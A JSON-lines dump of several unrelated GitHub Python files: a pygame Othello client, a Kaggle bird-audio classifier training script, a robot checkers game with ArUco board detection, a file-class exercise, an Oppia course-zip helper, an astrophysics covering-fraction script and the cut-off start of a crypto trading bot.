CONF.U.CURR_PLAYER_LABEL_X\n\n self.single_start_btn = self.add_child(ReverseColorButton(\n text='单机启动', font_size=48,\n width=48 * 5 + 8, height=48 + 8,\n callback=self.game.single_start,\n center=CONF.U.PLAY_BTN_POS['single'],\n ))\n 
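        # Each menu button passes a bound Game method as its callback; the
        # framework's ReverseColorButton presumably invokes it as
        # callback(pos, button), matching the (pos, button) signatures of
        # Game.single_start / start_server / join_game / exit_game.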
self.start_server_btn = self.add_child(ReverseColorButton(\n text='启动服务器', font_size=48,\n width=48 * 5 + 8, height=48 + 8,\n callback=self.game.start_server,\n center=CONF.U.PLAY_BTN_POS['server'],\n ))\n self.join_game_btn = self.add_child(ReverseColorButton(\n text='加入游戏', font_size=48,\n width=48 * 5 + 8, height=48 + 8,\n callback=self.game.join_game,\n center=CONF.U.PLAY_BTN_POS['join'],\n ))\n self.quit_game_btn = self.add_child(ReverseColorButton(\n text='退出游戏', font_size=48,\n width=48 * 5 + 8, height=48 + 8,\n callback=self.game.exit_game,\n center=CONF.U.PLAY_BTN_POS['exit'],\n ))\n\n def on_update(self, state_dict):\n state = self.game.state\n board = state.board\n valid_pos = set(board.valid_pos(state.current_player_id))\n\n for i, j, p in board.iter_board():\n piece = self.board_pieces[i][j]\n\n if p is None:\n piece.visible = False\n\n piece.disabled = (i, j) not in valid_pos\n else:\n piece.visible = True\n piece.disabled = True\n piece.color = state.players[p].color\n\n if self.game.status == 'running':\n self.current_player_tag.visible = True\n self.current_player_tag.center_y = CONF.U.PLAYER_LABEL_POS[state.current_player_id][1]\n self.current_player_tag.color = CONF.U.PLAYER_COLORS[state.current_player_id]\n\n counter = board.count_players()\n for i, label in self.player_labels.items():\n label.text = f'玩家{i}:{counter[i]}'\n else:\n self.current_player_tag.visible = False\n for i, label in self.player_labels.items():\n label.text = f'玩家{i}'\n\n for i, label in self.player_status_labels.items():\n ps = state.players[i].status\n _d = {\n 'win': '胜', 'lose': '负', 'draw': '平',\n }\n ps_str = _d.get(ps, None)\n if ps_str is None:\n label.visible = False\n else:\n label.visible = True\n label.text = ps_str\n\n def _draw(self, win: pygame.Surface, dt: int):\n win.fill(THECOLORS['white'])\n\n # Board\n for j in range(CONF.G.BOARD_WIDTH + 1):\n x_pos = CONF.U.BOARD_EDGES['left'] + j * (CONF.U.BOARD_EDGES['right'] - CONF.U.BOARD_EDGES['left']) / CONF.G.BOARD_WIDTH\n pygame.draw.line(\n win, CONF.U.BOARD_EDGE_COLOR,\n (x_pos, CONF.U.BOARD_EDGES['top']),\n (x_pos, CONF.U.BOARD_EDGES['bottom']),\n CONF.U.BOARD_LINE_WIDTH,\n )\n for i in range(CONF.G.BOARD_HEIGHT + 1):\n y_pos = CONF.U.BOARD_EDGES['top'] + i * (CONF.U.BOARD_EDGES['bottom'] - CONF.U.BOARD_EDGES['top']) / CONF.G.BOARD_HEIGHT\n pygame.draw.line(\n win, CONF.U.BOARD_EDGE_COLOR,\n (CONF.U.BOARD_EDGES['left'], y_pos),\n (CONF.U.BOARD_EDGES['right'], y_pos),\n CONF.U.BOARD_LINE_WIDTH,\n )\n\n for child in self.children[:]:\n draw_fn = getattr(child, 'draw', None)\n if draw_fn is not None:\n draw_fn(win, dt)\n\n\nclass UI:\n def __init__(self, game: 'Game', width, height, caption='Game'):\n self.game = game\n self.width = width\n self.height = height\n self.caption = caption\n self.window: pygame.Surface\n self.clock: pygame.time.Clock\n self.root: OthelloWorld\n\n def initialize(self):\n pygame.init()\n self.window = pygame.display.set_mode((self.width, self.height))\n pygame.display.set_caption(self.caption)\n\n self.root = OthelloWorld(game=self.game, width=self.width, height=self.height)\n\n self.clock = pygame.time.Clock()\n\n def finalize(self):\n pygame.quit()\n\n def dispatch_pygame_event(self, event: pygame.event.Event):\n return self.root.dispatch_pygame_event(event)\n\n def draw(self, dt):\n self.root.draw(self.window, dt)\n pygame.display.update()\n\n\nclass Game:\n \"\"\"Game = UI(EventDispatcher) + State + Client + Server (optional)\"\"\"\n def __init__(self):\n self.ui = UI(self, CONF.U.WIDTH, CONF.U.HEIGHT, 
'Othello')\n self.state = logic.GameState()\n self.server = None\n self.client = None\n self.status = 'idle'\n\n def initialize(self):\n self.ui.initialize()\n self.status = 'waiting'\n\n def finalize(self):\n self.status = 'idle'\n if self.server is not None:\n self.server.stop()\n self.ui.finalize()\n\n def run(self):\n self.initialize()\n\n try:\n while self.status in {'idle', 'waiting', 'running'}:\n dt = self.ui.clock.tick(CONF.U.FPS)\n\n for event in pygame.event.get(): # type: pygame.event.Event\n if event.type == pygame.QUIT:\n if self.ui.dispatch_pygame_event(event):\n # SIGTERM processed by widgets\n continue\n self.status = 'stopped'\n else:\n self.ui.dispatch_pygame_event(event)\n\n self.ui.draw(dt)\n finally:\n self.finalize()\n\n def update_game_status(self):\n if self.state.game_end():\n self.status = 'idle'\n\n def take_action(self, action: dict):\n logging.debug(f'take action: status={self.status}, action={action}')\n if action['type'] not in {'init', 'reset'} and self.status != 'running':\n return\n\n server_reply = self.client.send_action(action)\n self.state.load_state_dict(server_reply)\n self.update_game_status()\n utils.push_event(CONF.G.UPDATE_EVENT, state_dict=server_reply)\n\n def single_start(self, pos, button):\n if self.server is None:\n self.server = server.LocalThreadingServer()\n else:\n self.take_action({'type': 'reset'})\n if self.client is None:\n self.client = client.LocalClient(self.server)\n self.take_action({'type': 'init', 'ip_address': '', 'name': '玩家0'})\n self.take_action({'type': 'init', 'ip_address': '', 'name': '玩家1'})\n self.status = 'running'\n\n def start_server(self, pos, button):\n print('Starting server')\n\n def join_game(self, pos, button):\n print('Join game')\n\n def exit_game(self, pos, button):\n utils.push_event(pygame.QUIT)\n\n\ndef main():\n logging.basicConfig(\n level=logging.DEBUG,\n )\n\n game = Game()\n game.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fyabc/Toys","sub_path":"LearnMultiplayerGame/main_othello.py","file_name":"main_othello.py","file_ext":"py","file_size_in_byte":11332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24038890423","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\nimport csv\nimport librosa\nimport numpy as np\nfrom skimage.transform import resize\nfrom PIL import Image\nimport time\n\nimport os\nimport torch\nimport random\n\nnum_birds = 24\n# 6GB GPU-friendly (~4 GB used by model)\n# Increase if neccesary\nbatch_size = 16\n\n# This is enough to exactly reproduce results on local machine (Windows / Turing GPU)\n# Kaggle GPU kernels (Linux / Pascal GPU) are not deterministic even with random seeds set\n# Your score might vary a lot (~up to 0.05) on a different runs due to picking different epochs to submit\nrng_seed = 1234\nrandom.seed(rng_seed)\nnp.random.seed(rng_seed)\nos.environ['PYTHONHASHSEED'] = str(rng_seed)\ntorch.manual_seed(rng_seed)\ntorch.cuda.manual_seed(rng_seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\n\n# Model dataset class\n\n# In[4]:\n\n\nimport torch.utils.data as torchdata\n\nclass RainforestDataset(torchdata.Dataset):\n def __init__(self, filelist):\n self.specs = []\n self.labels = []\n for f in filelist:\n # Easier to pass species in filename at the start; worth changing later to more capable method\n label = int(str.split(f, '_')[1])\n label_array = np.zeros(num_birds, dtype=np.single)\n label_array[label] = 1.\n 
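            # label_array is a one-hot float target over num_birds classes,
            # e.g. label 3 -> [0., 0., 0., 1., 0., ...]; this multi-label
            # format is what the BCEWithLogitsLoss criterion below expects.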
self.labels.append(label_array)\n \n # Open and save spectrogram to memory\n \n # If you use more spectrograms (add train_fp, for example), then they would not all fit to memory\n # In this case you should load them on the fly in __getitem__\n img = Image.open('/Volumes/Software/rfcx-species-audio-detection/working/' + f)\n mel_spec = np.array(img)\n img.close()\n \n # Transforming spectrogram from bmp to 0..1 array\n mel_spec = mel_spec / 255\n # Stacking for 3-channel image for resnet\n mel_spec = np.stack((mel_spec, mel_spec, mel_spec))\n \n self.specs.append(mel_spec)\n \n def __len__(self):\n return len(self.specs)\n \n def __getitem__(self, item):\n # Augment here if you want\n return self.specs[item], self.labels[item]\n\n\n# Split training set on training and validation \n# \n# What StratifiedKFold does: \n# ![StratifiedKFold](https://scikit-learn.org/stable/_images/sphx_glr_plot_cv_indices_003.png)\n\n# In[5]:\n\n\nfile_list = []\nlabel_list = []\n\nfor f in os.listdir('/Volumes/Software/rfcx-species-audio-detection/working/'):\n if '.bmp' in f:\n file_list.append(f)\n label = str.split(f, '_')[1]\n label_list.append(label)\n\n\nfrom sklearn.model_selection import StratifiedKFold\n\nskf = StratifiedKFold(n_splits=5, shuffle=True, random_state=rng_seed)\n\ntrain_files = []\nval_files = []\n\nnum_file = 0\nprint\nfor fold_id, (train_index, val_index) in enumerate(skf.split(file_list, label_list)):\n # Picking only first fold to train/val on\n # This means loss of 20% training data\n # To avoid this, you can train 5 different models on 5 folds and average predictions\n if fold_id == 0 and num_file < 500:\n train_files = np.take(file_list, train_index)\n val_files = np.take(file_list, val_index)\n num_file += 1\n\nprint('Training on ' + str(len(train_files)) + ' examples')\nprint('Validating on ' + str(len(val_files)) + ' examples')\n\n\n# Preparing everything for training\n\n# In[6]:\n\n\n#get_ipython().system(u'pip install resnest > /dev/null')\n\n\n# In[7]:\n\n\nimport torch.nn as nn\nfrom resnest.torch import resnest50\n\ntrain_dataset = RainforestDataset(train_files)\nval_dataset = RainforestDataset(val_files)\n\ntrain_loader = torchdata.DataLoader(train_dataset, batch_size=batch_size, sampler=torchdata.RandomSampler(train_dataset))\nval_loader = torchdata.DataLoader(val_dataset, batch_size=batch_size, sampler=torchdata.RandomSampler(val_dataset))\n\n# ResNeSt: Split-Attention Networks\n# https://arxiv.org/abs/2004.08955\n# Significantly outperforms standard Resnet\nmodel = resnest50(pretrained=True)\n\nmodel.fc = nn.Sequential(\n nn.Linear(2048, 1024),\n nn.ReLU(),\n nn.Dropout(p=0.2),\n nn.Linear(1024, 1024),\n nn.ReLU(),\n nn.Dropout(p=0.2),\n nn.Linear(1024, num_birds)\n)\n\n# Picked for this notebook; pick new ones after major changes (such as adding train_fp to train data)\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01, weight_decay=0.0001, momentum=0.9)\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.4)\n\n# This loss function is not exactly suited for competition metric, which only cares about ranking of predictions\n# Exploring different loss fuctions would be a good idea\npos_weights = torch.ones(num_birds)\npos_weights = pos_weights * num_birds\nloss_function = nn.BCEWithLogitsLoss(pos_weight=pos_weights)\n\nif torch.cuda.is_available():\n model = model.cuda()\n loss_function = loss_function.cuda()\n\n\n# Training model on saved spectrograms\n\n# In[8]:\n\n\nbest_corrects = 0\n\n# Train loop\nprint('Starting training 
loop')\n\nstart = time.time()\nfor e in range(0, 2):\n # Stats\n train_loss = []\n train_corr = []\n \n # Single epoch - train\n model.train()\n for batch, (data, target) in enumerate(train_loader):\n data = data.float()\n if torch.cuda.is_available():\n data, target = data.cuda(), target.cuda()\n \n optimizer.zero_grad()\n \n output = model(data)\n loss = loss_function(output, target)\n \n loss.backward()\n optimizer.step()\n \n # Stats\n vals, answers = torch.max(output, 1)\n vals, targets = torch.max(target, 1)\n corrects = 0\n for i in range(0, len(answers)):\n if answers[i] == targets[i]:\n corrects = corrects + 1\n train_corr.append(corrects)\n \n train_loss.append(loss.item())\n \n # Stats\n for g in optimizer.param_groups:\n lr = g['lr']\n print('Epoch ' + str(e) + ' training end. LR: ' + str(lr) + ', Loss: ' + str(sum(train_loss) / len(train_loss)) +\n ', Correct answers: ' + str(sum(train_corr)) + '/' + str(train_dataset.__len__()))\n \n # Single epoch - validation\n with torch.no_grad():\n # Stats\n val_loss = []\n val_corr = []\n \n model.eval()\n for batch, (data, target) in enumerate(val_loader):\n data = data.float()\n if torch.cuda.is_available():\n data, target = data.cuda(), target.cuda()\n \n output = model(data)\n loss = loss_function(output, target)\n \n # Stats\n vals, answers = torch.max(output, 1)\n vals, targets = torch.max(target, 1)\n corrects = 0\n for i in range(0, len(answers)):\n if answers[i] == targets[i]:\n corrects = corrects + 1\n val_corr.append(corrects)\n \n val_loss.append(loss.item())\n \n # Stats\n print('Epoch ' + str(e) + ' validation end. LR: ' + str(lr) + ', Loss: ' + str(sum(val_loss) / len(val_loss)) +\n ', Correct answers: ' + str(sum(val_corr)) + '/' + str(val_dataset.__len__()))\n \n # If this epoch is better than previous on validation, save model\n # Validation loss is the more common metric, but in this case our loss is misaligned with competition metric, making accuracy a better metric\n if sum(val_corr) > best_corrects:\n print('Saving new best model at epoch ' + str(e) + ' (' + str(sum(val_corr)) + '/' + str(val_dataset.__len__()) + ')')\n torch.save(model, 'best_model.pt')\n best_corrects = sum(val_corr)\n \n # Call every epoch\n scheduler.step()\n end = time.time()\n print('this epoch takes ' + str(end - start))\n\n# Free memory\ndel model\n\n\n# Function to split and load one test file\n\n# In[9]:\n\n\n# Already defined above; for reference\n\n# fft = 2048\n# hop = 512\n# sr = 48000\n# length = 10 * sr\n\ndef load_test_file(f):\n wav, sr = librosa.load('/kaggle/input/rfcx-species-audio-detection/test/' + f, sr=None)\n\n # Split for enough segments to not miss anything\n segments = len(wav) / length\n segments = int(np.ceil(segments))\n \n mel_array = []\n \n for i in range(0, segments):\n # Last segment going from the end\n if (i + 1) * length > len(wav):\n slice = wav[len(wav) - length:len(wav)]\n else:\n slice = wav[i * length:(i + 1) * length]\n \n # Same mel spectrogram as before\n mel_spec = librosa.feature.melspectrogram(slice, n_fft=fft, hop_length=hop, sr=sr, fmin=fmin, fmax=fmax, power=1.5)\n mel_spec = resize(mel_spec, (224, 400))\n \n mel_spec = mel_spec - np.min(mel_spec)\n mel_spec = mel_spec / np.max(mel_spec)\n \n mel_spec = np.stack((mel_spec, mel_spec, mel_spec))\n\n mel_array.append(mel_spec)\n \n return 
mel_array\n\n","repo_name":"liangy396/Kaggle_Audio","sub_path":"mini_train.py","file_name":"mini_train.py","file_ext":"py","file_size_in_byte":8939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11917887572","text":"from checkers.game import Game\nfrom checkers.minimax.algorithm import minimax\nimport time\nimport cv2\nimport pyrealsense2 as rs\nimport numpy as np\n\nMINIMAX_DEPTH = 3\n\ndef findAruco(img):\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n arucoDict = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_250)\n arucoParam = cv2.aruco.DetectorParameters()\n arucoDetector = cv2.aruco.ArucoDetector(arucoDict, arucoParam)\n \n marker_corners, ids, _ = arucoDetector.detectMarkers(gray)\n \n all_arucos = {}\n \n if ids is not None:\n for i in range (len(ids)):\n x_center = (marker_corners[i][0][0][0] + marker_corners[i][0][1][0] + marker_corners[i][0][2][0] + marker_corners[i][0][3][0])/4\n y_center = (marker_corners[i][0][0][1] + marker_corners[i][0][1][1] + marker_corners[i][0][2][1] + marker_corners[i][0][3][1])/4\n all_arucos[ids[i][0]] = [int(y_center/125), int(x_center/125)] # dictionary in the format id: [row, col] for every aruco marker ID\n \n cv2.aruco.drawDetectedMarkers(img, marker_corners)\n \n return all_arucos\n\n# start running the checkers game from here\ndef main():\n run = False # set state of the game\n \n # initialize camera\n pipeline = rs.pipeline()\n config = rs.config()\n config.enable_stream(rs.stream.color, 1920, 1080, rs.format.bgr8, 30)\n\n color_path = 'V00P00A00C00_rgb.avi'\n colorwriter = cv2.VideoWriter(color_path, cv2.VideoWriter_fourcc(*'XVID'), 30, (1920,1080), 1)\n pipeline.start(config)\n \n \n run = True # set state of the game\n game = Game()\n\n print(f\"Welcome to CheckUR5!\\n\\nHere are the commands you can type and send:\\n\")\n print(\"\\tstart - start the game\\n\\tquit - quit the game\\n\")\n userInput = input(\"Enter a command: \")\n\n if (userInput == 'start'):\n run = True\n elif (userInput == 'quit'):\n run = False\n else: # lol this logic isn't checking for bad commands after the else so it would just default to exit\n print(f\"ERROR:Please enter a valid command!\\n\\nHere are the commands you can type and send:\\n\")\n userInput = input(f\"\\tstart - start the game\\n\\tquit - quit the game\\n\")\n try:\n while run:\n winner = game.get_winner()\n \n if winner != None:\n if winner == \"orange\":\n print(f\"The UR5 Robot won the game!\\n\")\n else:\n print(f\"The Player won the game!\\n\")\n \n # TODO: maybe give option to reset and start the game again here???\n run = False\n # robot's turn\n elif game.turn == \"orange\":\n value, new_board = minimax(game.get_board(), MINIMAX_DEPTH, \"orange\", game)\n \n print(\"UR5 Robot's turn actions: \\n\")\n game.ai_move(new_board) # set robot's move decision and move robot\n # human player's turn\n elif game.turn == \"blue\":\n # TODO: add turn timeout after 20 seconds\n # timeout = 20 # 20 seconds to make a turn\n\n player_input = input(\"Player's turn, press A to end turn or B to get more options: \")\n\n if player_input == \"A\":\n # get next frame\n frames = pipeline.wait_for_frames()\n color_frame = frames.get_color_frame()\n if not color_frame:\n continue\n \n #convert images to numpy arrays\n color_image = np.asanyarray(color_frame.get_data())\n \n colorwriter.write(color_image)\n \n # warp & crop board image\n width, height = 1000, 1000\n point1 = np.float32([[561,110], [399, 917], [1485, 928], [1355, 105]])\n point2 = 
np.float32([[0, 0], [0, height-1], [width-1, height-1], [width-1, 0]])\n matrix = cv2.getPerspectiveTransform(point1, point2)\n output = cv2.warpPerspective(color_image, matrix, (width, height)) \n output = cv2.rotate(output, cv2.ROTATE_180)\n \n # sharpen image\n kernel = np.array([[0, -1, 0],\n [-1, 5,-1],\n [0, -1, 0]])\n output = cv2.filter2D(src=output, ddepth=-1, kernel=kernel)\n \n # find arucos and returns dictionary of aruco IDs and their positions on the board\n all_arucos = findAruco(output)\n \n game.update_board(all_arucos)\n \n # for id in all_arucos:\n # print(all_arucos[id][0])\n \n # print(all_arucos)\n \n # cv2.imshow(\"Image\", color_image)\n # cv2.imshow(\"Output\", output)\n \n # if cv2.waitKey(1) == ord(\"q\"):\n # break\n elif player_input == \"B\":\n print(\"MORE GAME OPTIONS:\")\n player_input = input(f\"\\n\\treset - reset the game\\n\\tquit - quit the game\\n\")\n if player_input == \"reset\":\n pass\n # TODO: add interaction to reset the game\n # lol idk how to incorporate this\n elif player_input == \"quit\":\n print(f\"Thank you for playing! :)\")\n run = False\n\n # indicate the moves/removes human has made\n # TODO: list out the actions the player took\n # print(f\"Player's turn actions: \\n\")\n\n # show output window\n # TODO : live feed while playing checkers game\n # cv2.imshow(\"Output\", output)\n \n # if cv2.waitKey(1) == ord(\"q\"):\n # break\n finally:\n colorwriter.release()\n cv2.destroyAllWindows()\n pipeline.stop()\n\nmain()\n","repo_name":"UR5-Senior-Design/CheckUR5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73715620007","text":"class File:\n def __init__(self, name, location, size, date_of_creation, file_encoding):\n self.name = name\n self.location = location\n self.size = size\n self.date_of_creation = date_of_creation\n self.file_encoding = file_encoding\n def create_file(self):\n print(f\"Creating {self.name} file...\")\n def update_file(self):\n print(f\"Updating {self.name} file...\")\n def delete_file(self):\n print(f\"Deleting {self.name} file...\")\nclass TextFile(File):\n def __init__(self, name, location, size, date_of_creation, file_encoding):\n super().__init__(name, location, size, date_of_creation, file_encoding)\nclass AudioFile(File):\n def __init__(self, name, location, size, date_of_creation, file_encoding, length, bit_rate):\n super().__init__(name, location, size, date_of_creation, file_encoding)\n self.length = length\n self.bit_rate = bit_rate\n def create_file(self):\n print(f\"Creating {self.name} audio file...\")\n def delete_file(self):\n print(\"Audio files cannot be deleted.\")\nclass VideoFile(File):\n def __init__(self, name, location, size, date_of_creation, file_encoding, length, video_quality):\n super().__init__(name, location, size, date_of_creation, file_encoding)\n self.length = length\n self.video_quality = video_quality\n def create_file(self):\n print(f\"Creating {self.name} video file...\")\n def delete_file(self):\n print(\"Video files cannot be deleted.\")\ndef main():\n print(\"File Creation Program\")\n print(\"1. Create Text File\")\n print(\"2. Create Audio File\")\n print(\"3. 
Create Video File\")\n choice = int(input(\"Enter your choice: \"))\n if choice == 1:\n name = input(\"Enter name: \")\n location = input(\"Enter location: \")\n size = int(input(\"Enter size: \"))\n date_of_creation = input(\"Enter date of creation: \")\n file_encoding = input(\"Enter file encoding: \")\n text_file = TextFile(name, location, size, date_of_creation, file_encoding)\n text_file.create_file()\n elif choice == 2:\n name = input(\"Enter name: \")\n location = input(\"Enter location: \")\n size = int(input(\"Enter size: \"))\n date_of_creation = input(\"Enter date of creation: \")\n file_encoding = input(\"Enter file encoding: \")\n length = int(input(\"Enter audio length: \"))\n bit_rate = int(input(\"Enter bit rate: \"))\n audio_file = AudioFile(name, location, size, date_of_creation, file_encoding, length, bit_rate)\n audio_file.create_file()\n elif choice == 3:\n name = input(\"Enter name: \")\n location = input(\"Enter location: \")\n size = int(input(\"Enter size: \"))\n date_of_creation = input(\"Enter date of creation: \")\n file_encoding = input(\"Enter file encoding: \")\n length = int(input(\"Enter video length: \"))\n video_quality = input(\"Enter video quality: \")\n video_file = VideoFile(name, location, size, date_of_creation, file_encoding, length, video_quality)\n video_file.create_file()\n else:\n print(\"Invalid choice\")\nif __name__ == \"__main__\":\n main()\n","repo_name":"mansipatil12/Hands_on_MachineLearning","sub_path":"Basics/lab_assignment2.py","file_name":"lab_assignment2.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20556793089","text":"import os\nimport zipfile\n\nimport shutil\nfrom xml.sax.saxutils import unescape\n\nfrom django.conf import settings\n\n\ndef remove_from_zip(zipfname, temp_zip_path, course_shortname, *filenames):\n try:\n tempname = os.path.join(temp_zip_path, course_shortname + '.zip')\n with zipfile.ZipFile(zipfname, 'r') as zipread:\n with zipfile.ZipFile(tempname, 'w') as zipwrite:\n for item in zipread.infolist():\n if item.filename not in filenames:\n data = zipread.read(item.filename)\n zipwrite.writestr(item, data)\n shutil.copyfile(tempname, zipfname)\n finally:\n shutil.rmtree(temp_zip_path)\n\n\ndef unescape_xml(xml_content):\n new_xml = unescape(xml_content,\n {\"'\": \"'\", \""\": '\"', \" \": \" \"})\n new_xml = new_xml.replace(' ', ' ') \\\n .replace('"', '\"') \\\n .replace('&', '&')\n return new_xml\n\n\ndef rewrite_xml_contents(user, course, xml_doc):\n temp_zip_path = os.path.join(settings.COURSE_UPLOAD_DIR,\n 'temp',\n str(user.id))\n module_xml = course.shortname + '/module.xml'\n try:\n os.makedirs(temp_zip_path)\n except OSError:\n pass # leaf dir for user id already exists\n\n course_zip_file = os.path.join(settings.COURSE_UPLOAD_DIR,\n course.filename)\n remove_from_zip(course_zip_file,\n temp_zip_path,\n course.shortname,\n module_xml)\n\n xml_content = xml_doc.toprettyxml(indent='',\n newl='',\n encoding='utf-8').decode('utf-8')\n xml_content = unescape_xml(xml_content)\n\n with zipfile.ZipFile(course_zip_file, 'a') as z:\n z.writestr(module_xml, xml_content)\n","repo_name":"DigitalCampus/django-oppia","sub_path":"oppia/utils/course_file.py","file_name":"course_file.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"19258558629","text":"#!/usr/bin/python\n\n'''\nPlots covering fraction over 
time as a heatmap\n'''\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\npd.options.mode.chained_assignment = None\n\ndef galaxyProps(location):\n\n    fname = location+'/i90/galaxy.props'\n    with open(fname) as f:\n        galID = f.readline().split()[1]\n        expn = f.readline().split()[1]\n        redshift = f.readline().split()[1]\n        mvir = f.readline().split()[1]\n        rvir = float(f.readline().split()[1])\n        inc = int(float(f.readline().strip().split()[1]))\n\n    return galID,expn,redshift,mvir,rvir,inc\n\n# Cf parameters\nCL = 0.8413\ntol = 13-4\npmin = 0.0\npmax = 1.0\niterations = 1000\n\nrootloc = '/mnt/cluster/abs/cgm/vela2b/'\nrootloc = '/home/jacob/research/velas/vela2b/'\nsubloc = 'vela{0:d}/a{1:.3f}/i{2:d}/{3:s}/'\nfilename = '{0:s}.{1:s}.a{2:.3f}.i90.ALL.sysabs.h5'\n\ngalNums = range(21,30)\n\nions = 'HI MgII CIV OVI'.split()\newcut = 0.1\n\nloD,hiD = 0,1.5\nnumDbins = 15\nDbins = np.linspace(loD,hiD,numDbins+1)\nDbinLabels = ['{0:.1f}'.format(i) for i in Dbins[1:]]\n\nfinalExpn = [0.550]*len(galNums)\n\nfor galNum,finala in zip(galNums,finalExpn):\n\n    print(galNum)\n\n    expns = np.arange(0.200,finala,0.01)\n    expnLabels = ['a{0:d}'.format(int(a*1000)) for a in expns]\n    header = [expnLabels,ions]\n    header = pd.MultiIndex.from_product(header)\n    results = np.zeros((numDbins,len(header)))\n    results = pd.DataFrame(results,columns=header,index=DbinLabels)\n\n    for a,aLabel in zip(expns,expnLabels):\n\n        loc = rootloc+'vela{0:d}/a{1:.3f}/'.format(galNum,a)\n\n        try:\n            galID,expn,redshift,mvir,rvir,inc = galaxyProps(loc)\n            \n            for ion in ions:\n\n                loc = rootloc+subloc.format(galNum,a,inc,ion)\n                sysabs = loc+filename.format(galID,ion,a)\n                df = pd.read_hdf(sysabs,'data')\n                \n                for i in range(numDbins):\n                    loD = np.round(Dbins[i]*rvir,1)\n                    hiD = np.round(Dbins[i+1]*rvir,1)\n\n                    index = (df['D']>=loD) & (df['D']<hiD)\n                    # 'EW_r' is assumed here as the equivalent-width column name\n                    numHits = (df['EW_r'][index]>ewcut).sum()\n                    numLOS = index.sum()\n\n                    fraction = float(numHits)/float(numLOS)\n                    results[aLabel,ion].iloc[i] = fraction\n\n        except IOError:\n            continue\n\n    s = 'vela2b-{0:d}_covering.h5'.format(galNum)\n    results.to_hdf(s,'data',mode='w')\n \n\n\n\n","repo_name":"jrvliet/analysis","sub_path":"bulkVelas/covering.py","file_name":"covering.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19130509252","text":"import REST.REST_API as CONST\r\nfrom REST.REST_API import REST_API\r\nimport configparser\r\nfrom Logging import Logger\r\nimport math\r\nimport schedule\r\nimport time\r\n\r\n\r\nconf = configparser.ConfigParser()\r\nconf.read(\"conf.ini\")\r\napi = REST_API()\r\n# set up logging\r\nlog = Logger('all.log',level='debug')\r\nkey = conf.get(\"section\", \"key\")\r\nsecret = conf.get(\"section\", \"secret\")\r\n# parameters\r\nmount = int(conf.get(\"section\", 'mount'))\r\nsymbol = conf.get(\"section\", 'symbol')\r\norder_sleep = int(conf.get(\"section\", \"order_sleep\"))\r\ntrading_strategy = int(conf.get(\"section\", \"trading_strategy\")) #1 = bid/ask spread, 2 = mid price\r\n\r\napi = REST_API()\r\napi.auth(key, secret)# authorize\r\n\r\n# helper to pause the program\r\ndef sleep(t):\r\n    time.sleep(t)\r\n# cancel an order\r\ndef ordercancle(index,order_id):\r\n    log.logger.info(str(index) + \" - order id \" +str(order_id))\r\n    cmd = api.cancel_order_cmd(index,order_id)\r\n    success, r = api.multi_sign_cmd(cmd)\r\n    if success:\r\n        if index == 2:\r\n            log.logger.info(\"sell order cancelled\")\r\n        elif index == 1:\r\n            log.logger.info(\"buy order cancelled\")\r\n        log.logger.info(\"cancellation cooldown...\")\r\n        sleep(5)\r\n    else:\r\n        log.logger.info(r)\r\n# get order status\r\ndef orderstatus(order_id):\r\n    success, r = 
api.get_order(order_id)\r\n    #log.logger.info(r)\r\n    if success:\r\n        status = int(r['result'][0]['result']['status'])\r\n    else:\r\n        log.logger.info(r)\r\n        return 0\r\n    #log.logger.info(status)\r\n    if status == 3:\r\n        return 3\r\n    elif status == 2:\r\n        return 2\r\n    else:\r\n        return 0\r\n# poll in a loop until the order completes\r\ndef orderjust(order_id):\r\n    flag=0\r\n    while True:\r\n        r = orderstatus(order_id)\r\n        if r == 3:\r\n            return True\r\n        elif r == 2:\r\n            log.logger.info(\"order partially filled...\")\r\n        else:\r\n            log.logger.info(\"order waiting to be matched...\")\r\n        flag+=1\r\n        sleep(1)\r\n        if flag == order_sleep:\r\n            return False\r\n# precision control: truncate the extra digits outright, no rounding\r\ndef digits(num, digit):\r\n    site = pow(10, digit)\r\n    tmp = num * site\r\n    tmp = math.floor(tmp) / site\r\n    return tmp\r\ndef pricedecimal(num):\r\n    return digits(num, 4)\r\n# get the best bid/ask and derive the working price from the spread\r\ndef getprice():\r\n    success, ticker = api.get_ticker(symbol)\r\n    if success:\r\n        buy = float(ticker['result']['buy'])\r\n        sell = float(ticker['result']['sell'])\r\n        return buy,sell\r\n    else:\r\n        print(\"failed to fetch bid/ask prices!\")\r\n        log.logger.info(ticker)\r\n        return 1,0\r\n# get the USDT balance\r\ndef getusdt():\r\n    success, usdt = api.get_balance(1)\r\n    if success:\r\n        r = usdt['result'][0]['result']['assets_list'][3]['balance']\r\n        return r\r\n    else:\r\n        log.logger.info(usdt)\r\n        return 0\r\ndef handler():\r\n    buyprice, sellprice = getprice()# fetch best bid/ask\r\n    if trading_strategy == 2:# mid price (with a 0.1% spread)\r\n        r = (buyprice+sellprice)/2.0\r\n        r = digits(r,4)\r\n        #print(\"bid\",buyprice,\"ask\",sellprice,\"mid\",r)\r\n        log.logger.info(\"bid \"+str(buyprice)+\" ask \"+str(sellprice)+\" mid \"+str(r))\r\n        buyprice=r\r\n        sellprice=r+0.0001\r\n    elif trading_strategy ==1:# best bid/ask\r\n        #print(\"bid\", buyprice, \"ask\", sellprice)\r\n        log.logger.info(\"bid \"+str(buyprice)+\" ask \"+str(sellprice))\r\n    margin = buyprice - sellprice\r\n    if margin <= 0:\r\n        buymount = 